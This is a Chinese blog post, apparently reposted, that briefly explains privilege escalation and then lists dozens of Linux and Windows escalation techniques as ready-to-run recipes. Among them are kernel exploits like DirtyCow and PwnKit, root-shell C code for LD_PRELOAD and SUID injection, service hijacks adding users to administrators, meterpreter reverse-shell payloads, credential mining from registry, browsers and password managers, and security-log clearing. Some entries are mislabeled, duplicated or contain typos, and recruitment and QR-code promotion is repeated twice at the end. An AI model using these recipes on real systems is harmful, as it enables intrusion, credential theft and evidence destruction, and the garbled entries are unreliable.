什么是网络安全中的权限提升?(一)

最新推荐文章于 2024-05-11 00:20:27 发布
最新推荐文章于 2024-05-11 00:20:27 发布
阅读量1.1k 收藏 18
点赞数 19
文章标签: web安全 安全 网络攻击 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuli1024/article/details/135495621
版权

什么是网络安全中的权限提升?

在网络安全领域,了解威胁至关重要,而最关键的威胁之一就是特权升级的概念。从本质上讲,权限升级是指攻击者获得通常为高级用户保留的系统权限或功能的情况。

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。

鉴于网络安全不断发展的形势,对特权升级等威胁保持警惕至关重要。它强调了不断更新安全协议、监控系统活动以及确保正确分配和定期审核用户角色和权限的重要性。这样做,组织可以减轻与未经授权的访问相关的风险,并保持对潜在网络对手的强大防御。

现在我们已经熟悉了这个概念,我们将继续研究这个提权概念的117种方法:

117种提权手法

DirtyC0w

域:No

Local Admin: Yes

操作系统: Linux

类型: 0/1 Exploit

方法: gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

批注:https://github.com/firefart/dirtycow

CVE-2016-1531

域:No

Local Admin: Yes

操作系统: Linux

类型: 0/1 Exploit

方法: CVE-2016-1531.sh;id

批注:https://github.com/crypticdante/CVE-2016-1531

Polkit

域:No

Local Admin: Yes

操作系统: Linux

类型: 0/1 Exploit

方法:

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

./2. poc.sh

DirtyPipe

域:No

Local Admin: Yes

操作系统: Linux

类型: 0/1 Exploit

方法:

  1. ./traitor-amd64 –exploit kernel:CVE-2022-0847

  2. Whoami;id

批注:https://github.com/liamg/traitor/releases/tag/v0.0.14

PwnKit

域:No

Local Admin: Yes

操作系统: Linux

类型: 0/1 Exploit

方法:

  1. ./cve-2021-4034

  2. Whoami;id

批注:https://github.com/berdav/CVE-2021-4034

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

ms14_058

域:No

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  • msf > use exploit/windows/local/ms14_058_track_popup_menu

  • msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id >

  • msf exploit(ms14_058_track_popup_menu) > exploit

Hot Potato

域:No

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  1. 命令提示符下: powershell.exe -nop -ep bypass

  2. 在Power Shell提示符类型输入: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

  3. 在Power Shell提示符类型输入: Invoke-Tater -Trigger 1 -Command “net localgroup administrators user /add”

  4. 要确认攻击是否成功,请在 Power Shell 提示符中键入: net localgroup administrators

批注:https://github.com/Kevin-Robertson/Tater

Intel SYSRET

域:No

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  1. execute -H -f sysret.exe -a "-pid [pid]"

批注:https://github.com/jajp777/sysret

release版本:https://github.com/jajp777/sysret/tree/master/x64/Release

PrintNightmare

域:Yes

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

https://github.com/outflanknl/PrintNightmare

  1. PrintNightmare 10.10.10.10 exp.dll

Folina

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

https://github.com/JohnHammond/msdt-follina

  1. python3 follina.py -c "notepad"

ALPC

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

https://github.com/riparino/Task_Scheduler_ALPC

RemotePotato0

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  1. sudo ntlmrelayx.py -t ldap://10.0.0.10 –no-wcf-server –escalate-user normal_user

  2. .\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

批注:

ntlmrelayx.py只找到个很相似的:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe

remotepotato:https://github.com/antonioCoco/RemotePotato0/releases/tag/1.2

CVE-2022-26923

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  1. certipy req ‘lab.local/cve$:CVEPassword1234*@10.100.10.13’ -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA

  2. Rubeus.exe asktgt /user:"目标_sam名称" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_域名" /dc:"域名_CONTROLLER" /show

批注:

rubeus:https://github.com/GhostPack/Rubeus

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

MS14-068

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: 0/1 Exploit

方法:

  1. python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

批注:

无py版本,exe版本:https://github.com/ianxtianxt/MS14-068

Sudo LD_PRELOAD

域:No

Local Admin: Yes

操作系统: Linux

类型: Injection

方法:

 #include <stdio.h>  
 #include <sys/types.h>  
 #include <stdlib.h>  
 void \_init() {  
 unsetenv(“LD\_PRELOAD”);  
     setgid(0);  
     setuid(0);  
     system(“/bin/bash”);  
 }

  1. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles

  2. sudo LD_RELOAD=tmp/ldreload.so apache2

Abusing File Permission via SUID Binaries – .so injection)

域:No

Local Admin: Yes

操作系统: Linux

类型: Injection

方法:

  1. mkdir /home/user/.config

 #include <stdio.h>  
   
 #include <stdlib.h>  
   
 static void inject() \_attribute \_((constructor));  
   
 void inject() {  
   
  system(“cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash \-p”);  
   
 }

  1. gcc -shared -o /home/user/.config/libcalc.so -fPIC/home/user/.config/libcalc.c

  2. /usr/local/bin/suid-so

id

DLL Injection

域:No

Local Admin: Yes

操作系统: Windows

类型: Injection

方法:

  1. RemoteDLLInjector64

Or

MemJect

Or

https://github.com/tomcarver16/BOF-DLL-Inject

  1. #define PROCESS_NAME "csgo.exe"

Or

RemoteDLLInjector64.exe pid C:\runforpriv.dll

Or

mandllinjection ./runforpriv.dll pid

批注:

remoteDllInjector:https://github.com/Al1ex/RemoteDLLInjector

memject:https://github.com/danielkrupinski/MemJect

Early Bird Injection

域:No

Local Admin: Yes

操作系统: Windows

类型: Injection

方法:

hollow svchost.exe pop.bin

批注:hollow链接https://github.com/m0n0ph1/Process-Hollowing

Process Injection through Memory Section

域:No

Local Admin: Yes

操作系统: Windows

类型: Injection

方法:

  1. sec-shinject PID /path/to/bin

批注:未找到

Abusing Scheduled Tasks via Cron Path Overwrite

域:No

Local Admin: Yes

操作系统: Linux

类型: Abusing Scheduled Tasks

方法:

  1. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh;

  2. chmod +x systemupdate.sh

  3. 等待一会儿

  4. /tmp/bash -p

  5. id && whoami

Abusing Scheduled Tasks via Cron Wildcards

域:No

Local Admin: Yes

操作系统: Linux

类型: Abusing Scheduled Tasks

方法:

  1. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh;

  2. touch /home/user/ –checkpoint=1;

  3. touch /home/user/ –checkpoint-action=exec=sh\systemupdate.sh

  4. 等待一会儿

  5. /tmp/bash -p

  6. id && whoami

Abusing File Permission via SUID Binaries – Symlink)

域:No

Local Admin: Yes

操作系统: Linux

类型: Abusing File Permission

方法:

  1. su – www-data;

  2. nginxed-root.sh /var/log/nginx/error.log;

  3. In root user

  4. invoke-rc.d nginx rotate >/dev/null 2>&1

Abusing File Permission via SUID Binaries – Environment Variables #1)

域:No

Local Admin: Yes

操作系统: Linux

类型: Abusing File Permission

方法:

  1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c;

  2. gcc /tmp/services.c -o /tmp/service;

  3. export PATH=/tmp:$PATH;

  4. /usr/local/bin/sudi-env; id

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

Abusing File Permission via SUID Binaries – Environment Variables #2)

域:No

Local Admin: Yes

操作系统: Linux

类型: Abusing File Permission

方法:

  1. env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p

DLL Hijacking

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. Windows_dll.c: cmd.exe /k net localgroup administrators user /add

  2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  3. sc stop dllsvc & sc start dllsvc

Abusing Services via binPath

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. sc config daclsvc binpath= "net localgroup administrators user /add"

  2. sc start daclsvc

Abusing Services via Unquoted Path

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. msfvenom -p windows/exec CMD=’net localgroup administrators user /add’ -f exe-service -o common.exe

  2. common.exe 放在 'C:\Program Files\Unquoted Path Service'.

  3. sc start unquotedsvc

Abusing Services via Registry

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t

  2. REG_EXPAND_SZ /d c:\temp\x.exe /f

  3. sc start regsvc

Abusing Services via Executable File

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

  2. sc start filepermsvc

Abusing Services via Autorun

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

In Metasploit (msf > prompt) 类型:use multi/handler

In Metasploit (msf > prompt) 类型:set payload windows/meterpreter/reverse_tcp

In Metasploit (msf > prompt) 类型:set lhost [Kali VM IP Address]

In Metasploit (msf > prompt) 类型:run

打开另一个命令提示符并键入:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

program.exe 放在 'C:\Program Files\Autorun Program'.

Abusing Services via AlwaysInstallElevated

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

msiexec /quiet /qn /i C:\Temp\setup.msi

Or

SharpUp.exe AlwaysInstallElevated

批注:sharpup链接https://github.com/GhostPack/SharpUp

Abusing Services via SeCreateToken

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

!rmpriv

Abusing Services via SeDebug

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

Conjure-LSASS

Or

syscall_enable_priv 20

Remote Process via Syscalls (HellsGate|Hal操作系统Gate)

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

injectEtwBypass pid

批注:https://github.com/boku7/injectEtwBypass

Escalate With DuplicateTokenEx

域:Yes

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

PrimaryTokenTheft.exe pid

Or

TokenPlaye.exe –impersonate –pid pid

批注:

primarytokenthenft:https://github.com/slyd0g/PrimaryTokenTheft

tokenplaye:https://github.com/S1ckB0y1337/TokenPlayer/releases/tag/v0.8

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

Abusing Services via SeIncreaseBasePriority

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

start /realtime SomeCpuIntensiveApp.exe

批注:

找了一圈,只有这儿有相关内容:https://github.com/gtworek/Priv2Admin

Abusing Services via SeManageVolume

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

只需编译并运行SeManageVolumeAbuse

批注:https://github.com/xct/SeManageVolumeAbuse

Abusing Services via SeRelabel

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

WRITE_OWNER对资源的访问权限,包括文件和文件夹。

Run for privilege escalation

Abusing Services via SeRestore

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. 启动具有 SeRestore 权限的 PowerShell/ISE.

  2. 使用Enable-SeRestorePrivilege 启用权限.

  3. 将utilman.exe重命名为utilman.old

  4. 将cmd.exe重命名为utilman.exe

  5. 锁定控制台并按Win+U

Abuse via SeBackup

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic

In Metasploit (msf > prompt) 输入: set uripath x

In Metasploit (msf > prompt) 输入: run

在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”

并从弹出菜单中选择“创建转储文件”.

strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

选择复制 Base64 编码字符串

在命令提示符下键入:echo -ne [Base64 String] | Base64-d

Abusing via SeCreatePagefile

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin

批注:https://github.com/MagnetForensics/Hibr2Bin

Abusing via SeSystemEnvironment

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

TrustExec.exe -m exec -c "whoami /priv" -f

批注:两个工具都没找到QAQ

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

Abusing via SeTakeOwnership

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

  1. takeown.exe /f "%windir%\system32"

  2. icalcs.exe "%windir%\system32" /grant "%username%":F

  3. 将cmd.exe重命名为utilman.exe

  4. 锁定控制台并按Win+U

Abusing via SeTcb

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

PSBits

Or

PrivFu

psexec.exe -i -s -d cmd.exe

Abusing via SeTrustedCredManAccess

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

Or

CredManBOF

TrustExec.exe -m exec -c "whoami /priv" -f

Abusing tokens via SeAssignPrimaryToken

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

JuicyPotato.exe

Or

https://github.com/decoder-it/juicy_2

https://github.com/antonioCoco/RoguePotato

Abusing via SeCreatePagefile

域:No

Local Admin: Yes

操作系统: Windows

类型: Abuse Privilege

方法:

./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics

flog -s 10s -n 200

Or

invoke-module LogCleaner.ps1

批注:wela链接https://github.com/Yamato-Security/WELA

日志伪造工具flog:https://github.com/mingrammer/flog

Certificate Abuse

域:Yes

Local Admin: Yes

操作系统: Windows

类型: Abusing Certificate

方法:

ceritify.exe request /ca:dc.domain.local\DC-CA /template:User…

Rubeus.exe asktgy /user:CORP\itadmin /certificate:C:\cert.pfx /password:password

Password Mining in Memory

域:No

Local Admin: Yes

操作系统: Linux

类型: Enumeration & Hunt

方法:

  1. ps -ef | grep ftp;

  2. gdp -p ftp_id

  3. info proc mappings

  4. q

  5. dump memory /tmp/mem [start] [end]

  6. q

  7. strings /tmp/mem | grep passw

Password Mining in Memory

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic

In Metasploit (msf > prompt) 输入: set uripath x

In Metasploit (msf > prompt) 输入: run

在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”

并从弹出菜单中选择“创建转储文件”.

strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

选择复制 Base64 编码字符串.

在命令提示符下键入: echo -ne [Base64 String] | base64 -d

Password Mining in Registry

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

打开命令并输入:

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUsername

在命令提示符下键入:

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultPassword

请注意输出中的凭据

在命令提示符下键入:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername

在命令提示符下键入:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword

  1. 注意输出中的凭据

在命令提示符下键入:

reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password

在命令提示符下键入:

reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly

记下加密的密码并输入:

C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]

从输出中记下凭据.

Password Mining in General Events via SeAudit

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics

flog -s 10s -n 200

Or

invoke-module LogCleaner.ps1

Password Mining in Security Events via SeSecurity

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics

flog -s 10s -n 200

Or

wevtutil cl Security

Startup Applications

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

In Metasploit (msf > prompt) 输入: use multi/handler

In Metasploit (msf > prompt) 输入: set payload windows/meterpreter/reverse_tcp

In Metasploit (msf > prompt) 输入: set lhost [Kali VM IP Address]

In Metasploit (msf > prompt) 输入: run

打开另一个命令提示符并键入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

将 x.exe 放在“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.

Password Mining in McAfeeSitelistFiles

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

SharpUp.exe McAfeeSitelistFiles

批注:https://github.com/GhostPack/SharpUp

Password Mining in CachedGPPPassword

域名: Y/N

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

SharpUp.exe CachedGPPPassword

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

Password Mining in DomainGPPPassword

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

SharpUp.exe domianGPPPassword

Password Mining in KeePass

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe keepass

Or

KeeTheft.exe

批注:

seatbelt:https://github.com/GhostPack/Seatbelt

KeeTheft未找到

Password Mining in WindowsVault

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe WindowsVault

Password Mining in SecPackageCreds

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe SecPackageCreds

Password Mining in PuttyH操作系统tKeys

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe PuttyHostKeys

Password Mining in RDCManFiles

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe RDCManFiles

Password Mining in RDPSavedConnections

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

Seatbelt.exe RDPSavedConnections

Password Mining in MasterKeys

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

SharpDPAPI masterkeys

批注:https://github.com/GhostPack/SharpDPAPI

Password Mining in Browsers

域:No

Local Admin: Yes

操作系统: Windows

类型: Enumeration & Hunt

方法:

SharpWeb.exe all

批注:https://github.com/djhohnstein/SharpWeb/releases/tag/v1.2

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

  • 2023届全国高校毕业生预计达到1158万人,就业形势严峻;

  • 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取


  

  

  

本文转自 [https://mp.weixin.qq.com/s/rwLoK\_fAaHlwRS\_lYEEqHg](https://mp.weixin.qq.com/s/rwLoK_fAaHlwRS_lYEEqHg),如有侵权,请联系删除。

题外话
===

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

*   2023届全国高校毕业生预计达到1158万人,就业形势严峻;
    
*   国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
    

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
![在这里插入图片描述](https://img-blog.csdnimg.cn/0c022a464b484d0684d58025935451d1.png#pic_center)

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。

### 网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

![](https://img-blog.csdnimg.cn/img_convert/26521be2a7bffa89e13a95b2c0db3328.png)

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

![](https://img-blog.csdnimg.cn/img_convert/ffb47dd7a8669d315f2bc65f7bd1cfd8.png)

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

### 1.学习路线图

![](https://img-blog.csdnimg.cn/img_convert/1e115f7287fa28ae3c1b8d6c8b62d6dd.png)

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

### 2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
![在这里插入图片描述](https://img-blog.csdnimg.cn/89a263c053a54776bea80840fc355121.jpeg#pic_center)


(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />


### 3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

![在这里插入图片描述](https://img-blog.csdnimg.cn/edfe7a745f3b4f739a5734bd1903bfc8.jpeg#pic_center)


因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取


<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />

### 4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

